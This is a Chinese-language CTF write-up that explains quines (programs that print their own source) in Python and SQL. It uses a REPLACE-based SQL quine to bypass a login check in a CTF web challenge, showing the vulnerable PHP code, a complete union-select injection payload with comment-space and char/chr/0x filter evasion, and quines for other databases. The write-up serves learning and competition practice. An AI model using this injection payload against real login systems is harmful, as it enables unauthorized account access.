前言

这两天在HDCTF遇到了Quine注入的考点,刚开始接触CTF的时候也在记不清哪个新生赛遇到了,这里记录一下

Quine是什么

quine是一种计算机程序,它不接受输入并产生自己源代码的副本作为唯一的输出。标准术语是自产生程序,能够直接读取自己源码、读入用户输入或空白的程序一般都不视为自产生程序。纪念美国哲学家奎恩(Willard Van Orman Quine)而命名

通常,用于在任何编程语言中创建一个自产生程序(Quine)在程序中具有两部分,一是用于执行实际打印的代码,二是表示代码文本形式的数据。

这里给出几个python3的Quine示例

1
a = 'a = {}{}{}; print(a.format(chr(39), a, chr(39)))'; print(a.format(chr(39), a, chr(39)))

chr(39)是单引号(')

1
c = 'c = %r; print(c %% c)'; print(c % c)

%r是一个万能的格式付,它会将后面给的参数原样打印出来,带有类型信息

1
exec(s:='print("exec(s:=%r)"%s)')

一些编程语言可以将字符串当作程序运行,Quine可以利用这个特点。Python、Ruby、Lua都可以

构造Quine

而在sql注入技术中,这是一种使得输入的sql语句和输出的sql语句一致的技术,常用于一些特殊的登陆绕过sql注入中

replace()函数

replace(object,search,replace) 把object对象中出现的search全部替换成replace

Quine的基本形式就是

1
REPLACE(str,编码的间隔符,str)

参数str的形式为

1
REPLACE(间隔符,编码的间隔符,间隔符)

这样运算的结果形式又变成了REPLACE(str,编码的间隔符,str)

例如间隔符为”.“,编码间隔符为CHAR(46),这样str就是

1
2
3
4
5
6
7
select REPLACE(".",CHAR(46),".");

+---------------------------+
| replace(".",char(46),".") |
+---------------------------+
| .                         |
+---------------------------+

构造出来的结果就是

1
2
3
4
5
6
7
select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');

+---------------------------------------------------------------------------+
| replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")') |
+---------------------------------------------------------------------------+
| replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")") |
+---------------------------------------------------------------------------+

但仔细观察可以发现还没有完全实现一致,在单双引号还存在细微区别

在刚刚构造的Quine中

1
2
Quine: REPLACE('str',编码的间隔符,'str')
str: REPLACE("间隔符",编码的间隔符,"间隔符")

这里str中的间隔符使用双引号的原因是,str已经被单引号包裹,为避免引号匹配问题引入新的转义符号,间隔符需要使用双引号

运算后的结果是REPLACE("str",编码的间隔符,"str"),所以让结果的str也用单引号包裹就能让输入和查询结果完全一致了

这时候就需要使用REPLACEstr的双引号换成单引号,这样最后就不会出现引号不一致的情况了

升级版Quine的基本形式,CHAR(34)是双引号,CHAR(39)是单引号

1
REPLACE(REPLACE('str',CHAR(34),CHAR(39)),编码的间隔符,'str')

升级版str的基本形式

1
REPLACE(REPLACE("间隔符",CHAR(34),CHAR(39)),编码的间隔符,"间隔符")

先将str里的双引号替换成单引号,再用str替换str里的间隔符

那么结果就是

1
2
3
4
5
6
7
select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+
| replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")') |
+------------------------------------------------------------------------------------------------------------------------------------------------------------+

实例解析

例题来源:第五空间智能安全大赛-Web-yet_another_mysql_injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$password=$_POST['password'];
if ($username !== 'admin') {
    alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
    alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
	die($FLAG);
}

这是一部分源码,这段代码逻辑要求username必须为admin,密码需要与查询到的password一致,才能拿到flag

通过盲注可以发现数据库里面是空表,因此需要我们的输入与最后的结果相等绕过验证,这就需要用到Quine

这里我们就来分析一手payload

1
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

其中1'/**/union/**/select/**/replace(replace('',char(34),char(39)),char(46),'')#是Quine的基本形式

1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#是str的基本形式

这样嵌套起来多次替换就达到了输入输出的相同的目的

如果char被过滤了,可以使用chr0x绕过

1
2
3
char(34),char(39)
chr(34),chr(39)
0x22,0x27

其他数据库的Quine

SQL Server

1
2
3
4
5
6
7
SELECT Replace(Replace(
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',
Char(34), Char(39)), Char(36),
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine')
AS Quine

DECLARE @ CHAR(65)='DECLARE @ CHAR(65)=#PRINT REPLACE(@,CHAR(35),CHAR(39)+@+CHAR(39))'PRINT REPLACE(@,CHAR(35),CHAR(39)+@+CHAR(39))

Oracle

1
2
3
4
5
6
7
8
9
SELECT Replace(Replace(
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',
Char(34), Char(39)), Char(36),
'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine')
AS Quine

select
substr(rpad(1,125,'||chr(39)),26)from dual;select
substr(rpad(1,125,'||chr(39)),26)from dual;

PostgreSQL

1
SELECT left(A.v, 81) || chr(39) || A.v || chr(39) || right(A.v, 12) FROM (SELECT 'SELECT left(A.v, 81) || chr(39) || A.v || chr(39) || right(A.v, 12) FROM (SELECT AS v) AS A;' AS v) AS A;

Snowflake

1
SELECT CURRENT_STATEMENT();

参考链接:

从三道赛题再谈Quine trick | ch3ns1r

https://stackoverflow.com/questions/4006189/quine-self-producing-sql-query

维基百科 Quine

本文采用CC-BY-SA-3.0协议,转载请注明出处
Author: ph0ebus